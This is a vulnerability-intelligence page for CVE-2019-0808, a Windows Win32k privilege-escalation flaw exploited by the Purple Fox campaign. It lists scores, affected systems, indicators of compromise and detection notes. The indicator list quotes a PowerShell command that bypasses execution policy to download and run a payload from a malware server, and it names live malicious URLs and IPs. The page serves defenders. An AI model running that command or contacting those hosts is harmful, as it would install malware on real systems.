cbcvebase.
CVE-2019-0808
published 2019-04-09

CVE-2019-0808: An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory, aka 'Win32k Elevation of…

PriorityP184high7.8CVSS 3.1
AVLACLPRLUINSUCHIHAH
KEVITWEXPLOIT
CISA Known Exploited Vulnerabilitydue 2022-05-03
Exploited in the wild
EPSS
53.30%
98.9th percentile
An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory, aka 'Win32k Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2019-0797.

Affected

19 ranges
VendorProductVersion rangeFixed in
microsoftwindows
microsoftwindows
microsoftwindows_server
microsoftwindows_server
microsoftwindows_server
microsoftwindows_server
microsoftwindows_server
microsoftwindows_server
microsoftwindows_server
microsoftwindows_server
microsoftwindows_server_2008
microsoftwindows_server_2012
msrcwindows_7_for_32-bit_systems_service_pack_1
msrcwindows_7_for_x64-based_systems_service_pack_1
msrcwindows_server_2008_for_32-bit_systems_service_pack_2
msrcwindows_server_2008_for_itanium-based_systems_service_pack_2
msrcwindows_server_2008_for_x64-based_systems_service_pack_2
msrcwindows_server_2008_r2_for_itanium-based_systems_service_pack_1
msrcwindows_server_2008_r2_for_x64-based_systems_service_pack_1

Detection & IOCsextracted from sources · hover to see the quote

hash82af45d8c057ef0cf1a61cc43290d21f37838dd1
hash6cac8138f1e7e64884494eff2b01c7b1df83aef2
hashe65c1a74275e7099347cbec3f9969f783d6f4f7d
filenamecve_2019_0808.exe
filenamecve_2019_0808.ps1
urlhttp://rawcdn.githack.cyou/up.php?key=1
domainspeedjudgmentacceleration.com
urlhttp://103.228.112.246:17881/57BC9B7E.Png
urlhttp://103.228.112.246:17881/0CFA042F.Png
ip103.228.112.246
ip117.187.136.141
registryHKLM\SYSTEM\CurrentControlSet\Services\{ac00-ac10}
pathC:\Windows\AppPatch\Acpsens.dll
filenamedbcode21mk.log
filenamesetupact64.log
commandcmd.exe /c powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('hxxp://103.228.112.246:17881/57BC9B7E.Png');MsiMake hxxp://103.228.112.246:17881/0CFA042F.Png"
  • CVE-2019-0808 exploit binary compiled on 10 September 2020; PDB path reveals it was sourced from a public GitHub repository named CVE-2019-0808
  • CVE-2019-0808 is targeted specifically against Windows 7 / Windows Server 2008 systems missing KB4489878, KB4489885, or KB2882822; check for absence of these hotfixes as a detection signal
  • Purple Fox payload uses steganography to embed LPE exploit binaries inside image files (key=3 & key=4); detect by inspecting pixel-level LSB encoding in downloaded images combined with IEX execution
  • Purple Fox MSI drops a VMProtect-protected DLL; PE section names starting with '.vmp' indicate VMProtect packing and should be flagged during file scanning
  • ·CVE-2019-0808 exploitation in the PurpleFox context targets only Windows 7 / Windows Server 2008 (64-bit); the exploit bundle script checks the OS version before selecting this CVE
  • ·The exploit code for CVE-2019-0808 used by Purple Fox was sourced from a publicly available GitHub repository, meaning the binary may vary across actors who recompile it

CVSS provenance

nvdv3.17.8HIGHCVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.2HIGHAV:L/AC:L/Au:N/C:C/I:C/A:C
vulncheck7.8HIGH
cisa7.8HIGH
vendor_msrc7.0HIGH
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.